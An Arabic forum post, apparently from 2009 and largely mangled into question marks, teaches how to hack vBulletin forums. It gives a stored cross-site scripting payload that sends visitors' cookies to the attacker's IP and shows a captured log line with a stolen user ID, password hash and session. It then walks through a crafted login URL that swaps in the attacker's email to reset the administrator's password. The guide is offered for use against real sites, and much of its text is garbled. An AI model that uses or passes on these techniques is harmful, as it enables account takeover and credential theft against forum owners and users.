الشبح مدير العام
عدد المساهمات : 16 عدد النقاط : 46 التقييم : 0 تاريخ التسجيل : 21/05/2009 العمر : 31
| موضوع: اختراق المنتديات ثغرة العادية الخميس مايو 21, 2009 4:00 pm | |
| ??? ???? ?????? ?????? ?????? ????? ????? ???? ??????? ????? ??? ?? ???????? ? ???? ?????? ? ??? ??????? ??? ????? ???? ??? ???? ???? ???? ??? ????? ?????? ??? ???: ?????? ????? ????? ???? ??????? : ??? ??????? ????? ??? ??????? ????? ?????? ??? ??????? ?????? ????????? ?????? ???? ?? ?? ???????? ??? ????????? ?? ???? ???????? ? ????? ??????? ?? ????? ???? ????? ?? ????????? ?? ?????? ????? ? ???????
???? ?? ????? ????? : ??? ???? ?????? ?????? ---------- ?????? : ---------
????? ????? ????? ??? ??? ????? .. ???? ??? ????????? ??????? ???? ???? ??????? ???????? ??? ??? ??????? ?????? ?????? ?? ???? ????? .. ??? ????? ?? ???? ??????? ?????? ??? HTML ..
?? ?????? ????? ???? ?? ?? (?? ????? ???? ??? HTML ) .. ?? ???? ?? ????? ????? ??? ?????? ??? ????? : <script>document.write('<img src="http://my_ip_address/'+document.******************+'">';</script>
?? ?????? ???? ??? IP Adress ??? ??? ??? IP ????? ?? .
?????? ???? ??? ?? ?????? ????? ?????? ??? ??????? ???? ???? ????? ????? ?????? ??????? ?? ???? ?????? ??? ?? ??? ????? ??????? ???? ????? ??? ???????? ?????? ???????? .. ?? ???? ??????? ?????? ??? ?????? ??? ??? ???? ?? ???? ???? ??????? ????? (?? ?????? ??? ??? ?? ???? ??? ????? ????? ??? IIS ?? Apache ?? ????? ) .
???? ?? ??? ??????? ????? ?? ???? ??? ??? Log ????? ???????? ???? ?????? ????? .. ???? ?? ??? ??????? ?????? .. ???? ?????? Apche ????? logs ????? Acces Log . ???? ???? ??????? ???? ?????? ?? ??????? .. ???
???? ?? ????? ????? ????????? .. ???? :
GET/ bbuserid=86;%20bbpassword=dd6169d68822a116cd97e1fb
ddf90622;%20sessionhash=a 4719cd620534914930b86839c4bb5f8;%20bbthreadview[54
20]=1012444064;%20bblastvi sit=1011983161
??? ????? ???? .. ??? ???????? ?? ???????? ?????? ??? ?????? ????? ???? ????? .. ??? ????? ? ?? ???? ????? ???? ????? ?????? ?? ??????? .. ???? ????? http://www.victim.com/vb/index.php?bbuseri...sword=[password hash] ???? ????? : " ???? ?????? ??? ( ??? ???? ???? ??? ???????....) " ?? ??? ?????? ??? ???? ?????? ?????? ??? ?? ????? ???? ??????? (???? ???? ??? ???????) .. ????? ????? ??? ???? ?????? ?????? ??? ???? ?????? .. ???? ??? (??????) ??? ?????? ?????? ?????????? ??? ????? ????? ??? ?? ?????? ?????? .. ?? ???? ??? ???? Forgot Password .. ?????? ?????? ??????? ???? ????? ?????? ?????? ..
????? ??? ???? ?? ??? ?? ????? ??? ??? !! ???? ??? ???? ?????? ????? ?? ???? .. !
------------ ???? -----------
??????? ?? ??? ?????? ?? ?????? ??? HTML ?? (??????? + ??????? ?????? + ???????? + ??????? + ... ) (??? ???? ???? ?? ????? ??? ??? HTML ??? ???? ???? )
??? ??? ???? ??? ??? IMG .. ???? ?????? ??????? ???????? ??? ???? <script> ???? ???? <img> ?? <Demon> ?? ?? ???? ???? ???? ???? ????? ??????? ???? ?? ???? ... ??? ?? ???? ????? ??? ??????? . Be Secret .. Dont' be Lamer .
????? ?????? ?????? : 31 - 1 - 2002 ?? ??????? ??? ??????? 2.2.0 ??? ???? ????? .
???? ?? ???????? ??? ??????? ?? ????? ???? ????????? ?? ??????? ????? ?????????
====================================== ?????? ??????? VP ====================================== ?????? ????????? ?? ???????? vb
. ?? ???????? ???? ?? ?????? ??????? ????? ?????
2. ???? ??????? ???? ???? ???????? ????? ???? ?????? ??
3. ???? ??? ?? ( ??????? ) ??????? ??????? ?? members .
?? ??????? ???????? ?????? : http://URL/memberlist.php
URL = ??????? ???????? ???????
??? = - .com
4. ???? ??? ?? ?????? ?? ?????????? ??????? ??????? ???? ????? ???? ??????? ?? ?????? ???????? address bar .
????? ?? ????? ???? ?????? ?????? ??????? ?????? ?????? :
http://URL/member.php?soitgoe68e45u...info&userid=266
??? ??????? ?????? ???? = ??? ?????? ???????? ??? 266
5. ??? ????? ??? ????? ?? 266 ??? ????? ???? ????
http://URL/member.php?soitgoe68e45u...etinfo&userid=1
????? ??? ???? ???? ????????? ???? ?? ?????? ??????? administrator .
(((== ?? ??? ????? ?????? ?????? ????? ????? ?? ?? ?????? ?????? == ))
???? ??? ?????? ??? ??? ??????? ??????? ???????
6. ???? ??????? ?????? ?? ????? ?????????? ???? ??????? :
http://URL/member.php?action=login&...VALI...ame='ADMIN'').'
??????? ??? ????? ?????? ??????? ???????
URL = ??? ????? ????? ?????? ???????? ??????? VALIDUSER = ??? ???????? ????? ?? VALIDPASS = ???? ???? ?????? ?? YOUR@EMAIL.HERE = ?????? ???? ???? ?? ???????? ADMIN = ??? ???? ??????? ( ???? ??????? ??????? ??????? )
7. ??? ?? ????? ???? ?? ??? ?????? ??? ???? ???? ????? ??????? ??? ???? refresh .
8. ?? ???? ????? ??????? ???????? http://url/index.php
?? ???? ?????? ???????? ??? ???????? ????? ?? ???????? ???? ?? ????? ( ??? ?? ???? ????? ) .
?????? ????? ?? ?????? ??????? ???? ???? :
??? ??? ?????? ???? ?? ?????
you typed in the wrong password
9. ??? ????? ???? ???
???? ???? ???? forgot password
????? ????? ?????? ???? ???? ??? ????? ??????????
10. ???? ????? ????? ???? ???? ?????? ????? ???????
?????? ??? ??????? ????? ????? ????????? ????? ?????? ??? ?????? ???? ?? ?????? ????? ??? ?? ??????? ?????
| |
|